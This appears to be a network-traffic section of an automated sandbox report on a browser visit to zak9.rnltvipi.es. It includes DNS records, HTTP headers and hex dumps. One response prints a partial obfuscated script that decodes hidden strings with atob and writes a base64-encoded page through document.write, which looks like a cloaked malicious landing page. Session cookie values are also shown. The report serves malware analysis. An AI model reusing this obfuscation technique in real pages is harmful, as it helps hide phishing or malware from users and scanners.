Mar 25, 2025 15:51:09.003334045 CET	192.168.2.4	1.1.1.1	0xa9db	Standard query (0)	a.nel.cloudflare.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:09.003509045 CET	192.168.2.4	1.1.1.1	0xe40f	Standard query (0)	a.nel.cloudflare.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 25, 2025 15:51:04.187426090 CET	1.1.1.1	192.168.2.4	0x296b	No error (0)	www.google.com	142.251.32.100	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:04.188158035 CET	1.1.1.1	192.168.2.4	0x203	No error (0)	www.google.com		65	IN (0x0001)	false
Mar 25, 2025 15:51:05.147239923 CET	1.1.1.1	192.168.2.4	0x7038	No error (0)	zak9.rnltvipi.es	104.21.65.232	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:05.147239923 CET	1.1.1.1	192.168.2.4	0x7038	No error (0)	zak9.rnltvipi.es	172.67.194.65	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:05.184637070 CET	1.1.1.1	192.168.2.4	0xc2d3	No error (0)	zak9.rnltvipi.es		65	IN (0x0001)	false
Mar 25, 2025 15:51:07.569699049 CET	1.1.1.1	192.168.2.4	0xc450	No error (0)	code.jquery.com	151.101.66.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:07.569699049 CET	1.1.1.1	192.168.2.4	0xc450	No error (0)	code.jquery.com	151.101.130.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:07.569699049 CET	1.1.1.1	192.168.2.4	0xc450	No error (0)	code.jquery.com	151.101.194.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:07.569699049 CET	1.1.1.1	192.168.2.4	0xc450	No error (0)	code.jquery.com	151.101.2.137	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:09.104998112 CET	1.1.1.1	192.168.2.4	0xa9db	No error (0)	a.nel.cloudflare.com	35.190.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

zak9.rnltvipi.es

code.jquery.com

a.nel.cloudflare.com

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.4	49740	142.250.65.195	80

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 15:51:12.348560095 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 15:51:12.442554951 CET	222	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 14:39:48 GMT Expires: Tue, 25 Mar 2025 15:29:48 GMT Age: 684 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 25, 2025 15:51:12.449342012 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 15:51:12.545567036 CET	223	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 14:30:24 GMT Expires: Tue, 25 Mar 2025 15:20:24 GMT Age: 1248 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49727	104.21.65.232	443	7524	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 14:51:05 UTC	659	OUT	GET /ebY7FU/ HTTP/1.1 Host: zak9.rnltvipi.es Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 14:51:06 UTC	1207	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 14:51:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WC%2BESSUOvK0nxQaxt2R6BPvNI7o0p82MZO4zOa6KZgr5TaBwiscRm%2Ff475Ijg06PeEXaPmMpR1BCTbt9hFZPxRw1eA%2FGpw9G63ETC7EZWdwMzAGu53v%2F9FuQWUGA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} server-timing: cfL4;desc="?proto=TCP&rtt=10238&min_rtt=10132&rtt_var=3875&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1555&delivery_rate=281089&cwnd=94&unsent_bytes=0&cid=40a6b09e0b20c991&ts=311&x=0" Set-Cookie: XSRF-TOKEN=eyJpdiI6IkVaZ292bWpQOG9uUEJsWVpScytMSGc9PSIsInZhbHVlIjoiSmM4OHI3UWJ1MkVhdUJiRU9LdmJXMS9yemk0RkF2U0FUdWJERkZtU09lQlMzcHFlM2F5bW5TL001NWszNzBWMURmNXNod1pyUmpVQWxPYlpKOFBOd2dtQ2M0S2plcDBmcklDL1puVGRSMkpDNVlURCtVandlRzBQVHZpLzJGSjUiLCJtYWMiOiI5OThiZTU1NjczNGY5Y2NkMWEzNzE1ZTU3OTAwMDdmZTQxYjYyZDZhNzljYWYxMmU5ZmU1ODg0M2Y2NGVhN2YyIiwidGFnIjoiIn0%3D; expires=Tue, 25-Mar-2025 16:51:05 GMT; Max-Age=7200; path=/; secure; samesite=none
2025-03-25 14:51:06 UTC	766	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 49 34 4f 44 46 4f 59 6a 4e 57 65 6d 70 78 64 47 67 72 4d 33 6f 31 63 6b 6f 33 54 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 31 4e 76 59 6c 63 32 64 54 68 32 62 6b 64 71 62 55 35 51 5a 6a 4e 44 56 48 42 70 54 6e 5a 4b 64 47 64 6c 63 58 56 5a 53 48 52 6d 62 47 35 33 54 6d 46 6e 55 44 68 4e 62 54 4e 6a 53 6d 31 77 59 57 39 6b 51 32 39 52 59 6e 4a 34 54 6e 4e 49 53 33 4a 69 61 47 78 74 4e 56 68 6d 4d 45 74 69 54 48 42 33 55 6c 6c 55 4f 57 5a 78 59 56 4a 7a 55 6e 68 31 61 45 39 57 64 47 49 77 62 6e 70 4a 61 32 64 50 57 6e 4e 30 65 54 6c 4c 52 6b 4e 74 53 45 6b 77 4d 33 67 77 4d 33 6c 49 54 47 31 6d 65 47 74 71 62 57 45 79 64 55 4d Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjI4ODFOYjNWempxdGgrM3o1cko3T3c9PSIsInZhbHVlIjoiM1NvYlc2dTh2bkdqbU5QZjNDVHBpTnZKdGdlcXVZSHRmbG53TmFnUDhNbTNjSm1wYW9kQ29RYnJ4TnNIS3JiaGxtNVhmMEtiTHB3UllUOWZxYVJzUnh1aE9WdGIwbnpJa2dPWnN0eTlLRkNtSEkwM3gwM3lITG1meGtqbWEydUM
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 51 71 4c 72 4e 45 74 44 54 63 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 36 59 57 73 35 4c 6e 4a 75 62 48 52 32 61 58 42 70 4c 6d 56 7a 4c 32 56 69 57 54 64 47 56 53 38 3d 22 29 3b 0a 4a 70 6c 4c 53 68 4e 66 62 53 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 4b 6f 53 49 62 44 74 71 65 77 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 51 71 4c 72 4e 45 74 44 54 63 20 3d 3d 20 4a 70 6c 4c 53 68 4e 66 62 53 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 4b 6f 53 49 62 44 74 71 65 77 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f Data Ascii: 7ffa<script>QqLrNEtDTc = atob("aHR0cHM6Ly96YWs5LnJubHR2aXBpLmVzL2ViWTdGVS8=");JplLShNfbS = atob("bm9tYXRjaA==");KoSIbDtqew = atob("d3JpdGU=");if(QqLrNEtDTc == JplLShNfbS){document[KoSIbDtqew](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f Data Ascii: OFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++oO++o
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f Data Ascii: FpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO++oO
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f Data Ascii: pO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oO++oOO
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b Data Ascii: OOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f Data Ascii: OFpO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO++oO++o
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f Data Ascii: +oOOFpO++oO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpO
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b Data Ascii: pOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO+
2025-03-25 14:51:06 UTC	1369	IN	Data Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 Data Ascii: OOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	151.101.66.137	443	7524	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 14:51:07 UTC	663	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://zak9.rnltvipi.es/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 14:51:07 UTC	565	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Tue, 25 Mar 2025 14:51:07 GMT Via: 1.1 varnish Age: 1583250 X-Served-By: cache-lga21926-LGA X-Cache: HIT X-Cache-Hits: 1858 X-Timer: S1742914268.947895,VS0,VE0 Vary: Accept-Encoding
2025-03-25 14:51:08 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-25 14:51:08 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else 